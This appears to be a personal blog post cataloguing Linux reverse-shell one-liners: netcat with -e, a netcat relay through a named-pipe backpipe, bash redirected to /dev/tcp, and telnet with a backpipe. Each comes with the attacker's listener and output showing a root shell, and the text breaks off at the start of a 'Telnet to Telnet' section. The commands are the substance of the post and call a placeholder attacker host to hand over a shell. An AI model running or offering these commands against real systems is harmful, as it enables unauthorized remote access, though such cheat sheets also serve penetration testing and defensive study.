Sam Stelfox

Thoughts from a software engineer, systems hacker and Linux gubernāre.

Linux Remote Shell Techniques

Abbreviations:

Standard Unsecure Netcat

This technique relies on a security feature being disabled when netcat was compiled (that is the -e option).

Target:

[[email protected] ~]# nc <AIP> <APORT> -e /bin/bash

Attacker:

[[email protected] ~]# nc -n -vv -l -p <APORT>
listening on [any] <APORT> ...
connect to [<AIP> from (UNKNOWN) [TIP] [TPORT]
id
uid=0(root) gid=0(root) groups=0(root)

Using Netcat with Security Hole Closed

is based on the common technique used to build netcat relays. When the GAPING_SECURITY_HOLE is disabled, which means you don’t have access to the ‘-e’ option of netcat, most people pass on using netcat and move to something else. Well this just isn’t necessary. Create a FIFO file system object and use it as a backpipe to relay standard output from commands piped from netcat to /bin/bash back into netcat.

Target:

[[email protected] ~]# mknod backpipe p && nc <AIP> <APORT> 0<backpipe | /bin/bash 1>backpipe

Attacker:

[[email protected] ~]# nc -n -vv -l -p <APORT>
listening on [any] <APORT> ...
connect to [<AIP> from (UNKNOWN) <TIP> <TPORT>
id
uid=0(root) gid=0(root) groups=0(root)

Netcat Without Netcat

I love “hacks” that use features of the operating system against itself. This is one of those “hacks”. It takes the /dev/tcp socket programming feature and uses it to redirect /bin/bash to a remote system. It’s not always available, but can be quite handy when it is.

Target:

[[email protected] ~]# /bin/bash -i > /dev/tcp/<AIP>/<APORT> 0<&1 2>&1

Attacker:

[[email protected] ~]# nc -n -vv -l -p <APORT>
listening on [any] <APORT> ...
connect to [<AIP> from (UNKNOWN) <TIP> <TPORT>
[[email protected] ~]# id
uid=0(root) gid=0(root) groups=0(root)
[[email protected] ~]#

Netcat Without Netcat or /dev/tcp

For when /dev/tcp is not available either, combine it with the backpipes

Target:

[[email protected] ~]# mknod backpipe p && telnet <AIP> <APORT> 0<backpipe | /bin/bash 1>backpipe

Attacker:

[[email protected] ~]# nc -n -vv -l -p <APORT>
listening on [any] <APORT> ...
connect to [<AIP> from (UNKNOWN) [TIP] [TPORT]
id
uid=0(root) gid=0(root) groups=0(root)

Telnet to Telnet

By god this is an ugly one... but it works... and if it's all you got then it's all you got.

Target: